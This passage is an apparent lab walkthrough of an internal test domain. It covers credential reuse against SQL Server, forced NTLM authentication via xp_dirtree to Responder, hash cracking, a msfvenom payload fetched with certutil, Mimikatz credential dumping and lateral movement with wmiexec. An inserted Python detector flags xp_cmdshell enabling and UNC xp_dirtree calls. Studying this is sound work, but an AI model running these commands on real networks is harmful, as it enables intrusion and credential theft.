445/tcp   open  microsoft-ds Windows Server (R) 2008 Datacenter 6003 Service Pack 2 microsoft-ds (workgroup: TEST)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode: 
|   2.0.2: 
|_    Message signing enabled but not required
| ms-sql-info: 
|   Windows server name: WIN2008
|   192.168.93.20\MSSQLSERVER: 
|     Instance name: MSSQLSERVER
|     Version: 
|       name: Microsoft SQL Server 2008 RTM
|       number: 10.00.1600.00
|       Product: Microsoft SQL Server 2008
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| smb2-time: 
|   date: 2022-09-05T08:13:42
|_  start_date: 2019-12-14T11:49:34
|_nbstat: NetBIOS name: WIN2008, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ab:44:ec (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Datacenter 6003 Service Pack 2 (Windows Server (R) 2008 Datacenter 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp2
|   Computer name: win2008
|   NetBIOS computer name: WIN2008\x00
|   Domain name: test.org
|   Forest name: test.org
|   FQDN: win2008.test.org
|_  System time: 2022-09-05T16:13:42+08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.86 seconds
```

Nothing much of use there. Remember that the Joomla config file we saw contained credentials; try them for a remote SQL Server connection.

# Remote SQL Server connection

Download DBeaver.

Create a new connection.

A driver component has to be downloaded before connecting.

Then connect, with the credentials from earlier:

```php
public $user = 'testuser';
public $password = 'cvcvgjASD!@';
```

Connected.

# SQL Server getshell

https://www.cnblogs.com/sakura521/p/14967745.html

First try the xp_cmdshell component:

```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE;
```

No permission for that, so try xp_dirtree:

```sql
EXEC master.sys.xp_dirtree 'C:\',0,1;
```

It executes but returns nothing, probably because the privileges aren't enough. So instead use this host to reach the Responder listener started on web-centos, capture the 2008 box's hash, and crack the password.

# Responder

Download Responder onto web-centos:

```shell
wget -r 192.168.47.130
```

Capture on the internal interface:

```shell
python Responder.py -I eth1
```

Then trigger it from SQL Server:

```sql
EXEC master.sys.xp_dirtree '\\192.168.93.100\IP1$',0,1;
```

```text
[SMB] NTLMv2-SSP Client   : 192.168.93.20
[SMB] NTLMv2-SSP Username : WIN2008\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WIN2008:1122334455667788:28BA43AD9B1D2D2BBA9E28983003CD67:0101000000000000715D1E3A07C1D80167899FBF6BFBE4590000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000011C4314A8F10C5B6E59317CE9DBBCF8859B4494BEA8E251FCE09E150BA4F27F40000000000000000
```

Crack it locally; john and hashcat recover it:

```text
123qwe!AWD
```
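From the detection side, as an added example not taken from the writeup: Python that scans SQL Server statement audit lines for the two things this section does, an attempt to enable xp_cmdshell via sp_configure and a UNC path handed to xp_dirtree (or its siblings) that points anywhere other than an approved file server, which is the forced-authentication pattern a listener like Responder feeds on. The audit line format, the `ALLOWED_FILE_SERVERS` set and the sample lines are constructed/assumed for the example.

```python
import re

# Extended procedures that make SQL Server open an SMB connection when given a
# UNC path; the service account then authenticates (NTLM) to whatever answers.
UNC_PROCS = re.compile(
    r"\b(xp_dirtree|xp_fileexist|xp_subdirs|xp_getfiledetails)\b\s*'?(\\\\[^'\s]+)",
    re.IGNORECASE,
)
UNC_HOST = re.compile(r"^\\\\([^\\]+)")
# Turning on OS command execution through the configuration procedure.
ENABLE_CMDSHELL = re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.IGNORECASE)

# File servers that may legitimately be reached by UNC (assumed value for the example).
ALLOWED_FILE_SERVERS = {"fileserver.test.org"}


def parse_audit_line(line):
    """Constructed audit line format: time|login|client_host|statement."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("time", "login", "client", "statement"), parts))


def analyse_statement(statement):
    """Return [(alert, target_host_or_None)] for one T-SQL batch."""
    alerts = []
    if ENABLE_CMDSHELL.search(statement):
        alerts.append(("xp_cmdshell-enable-attempt", None))
    for proc, unc in UNC_PROCS.findall(statement):
        host = UNC_HOST.match(unc).group(1)
        if host.lower() in ALLOWED_FILE_SERVERS:
            continue  # approved share, no alert
        alerts.append((proc.lower() + "-unc-to-unapproved-host", host))
    return alerts


def scan_audit(text):
    """Run every audit line through the rules; returns (time, login, client, alert, host)."""
    out = []
    for line in text.splitlines():
        rec = parse_audit_line(line)
        if rec is None:
            continue
        for alert, host in analyse_statement(rec["statement"]):
            out.append((rec["time"], rec["login"], rec["client"], alert, host))
    return out


# Constructed sample in the format above: the statements this section issues
# (seen by the server as coming from the proxy host) plus a benign UNC call
# to the approved file server.
SAMPLE_AUDIT = """\
2022-09-05T16:13:40|testuser|192.168.93.100|EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE;
2022-09-05T16:14:02|testuser|192.168.93.100|EXEC master.sys.xp_dirtree 'C:\\',0,1;
2022-09-05T16:15:31|testuser|192.168.93.100|EXEC master.sys.xp_dirtree '\\\\192.168.93.100\\IP1$',0,1;
2022-09-05T16:16:00|backupsvc|192.168.93.10|EXEC master.sys.xp_dirtree '\\\\fileserver.test.org\\backups',1,1;
"""

if __name__ == "__main__":
    for hit in scan_audit(SAMPLE_AUDIT):
        print(hit)
```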

# wmiexec session

https://www.freebuf.com/sectool/175208.html

```shell
proxychains impacket-wmiexec administrator@192.168.93.20
```

And that's this one taken.

# msf session

Since we have the plaintext password, let's try msf's psexec module:

```text
msf6 > search psexec

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal     No     DCOM Exec
   1   exploit/windows/smb/ms17_010_psexec          2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2   auxiliary/admin/smb/ms17_010_command         2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3   auxiliary/scanner/smb/psexec_loggedin_users                   normal     No     Microsoft Windows Authenticated Logged In Users Enumeration
   4   exploit/windows/smb/psexec                   1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   5   auxiliary/admin/smb/psexec_ntdsgrab                           normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   6   exploit/windows/local/current_user_psexec    1999-01-01       excellent  No     PsExec via Current User Token
   7   encoder/x86/service                                           manual     No     Register Service
   8   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal     No     WMI Exec
   9   exploit/windows/smb/webexec                  2018-10-24       manual     No     WebExec Authenticated User Code Execution
   10  exploit/windows/local/wmi                    1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution


Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi

msf6 > use 4
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set SMBUSER administrator
SMBUSER => administrator
msf6 exploit(windows/smb/psexec) > set SMBPASS 123qwe!ASD
SMBPASS => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > setg proxies socks:127.0.0.1:8989
proxies => socks:127.0.0.1:8989
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 exploit(windows/smb/psexec) > exploit 
```

No session. Humiliating.

Different approach: generate a backdoor with msf, upload it to the host and execute it.

```shell
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.93.20 RPORT=5555 -f exe > exp.exe
```

Start a web server with python on web-centos:

```shell
python -m SimpleHTTPServer 8080
```

Download it on Windows:

```text
certutil -urlcache -split -f http://192.168.93.100:8080/exp.exe c:\exp.exe
```

It's downloaded.

```text
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.93.20
set RPORT 5555
exploit
```

Session established.

# Information gathering

First escalate to SYSTEM:

```text
meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Check the IP.

# System processes

There's a TEST/administrator process; let's see whether we can grab the password.

# load kiwi

Got the domain admin's password:

```text
Administrator  TEST     zxcASDqw123!!
Administrator  WIN2008  123qwe!ASD
```

# win 2012

# wmiexec session

```shell
proxychains impacket-wmiexec test/Administrator@192.168.93.10
```

Password: zxcASDqw123!!

# PC

# wmiexec session

```shell
proxychains impacket-wmiexec ./Administrator@192.168.93.30
```

Password: 123qwe!ASD
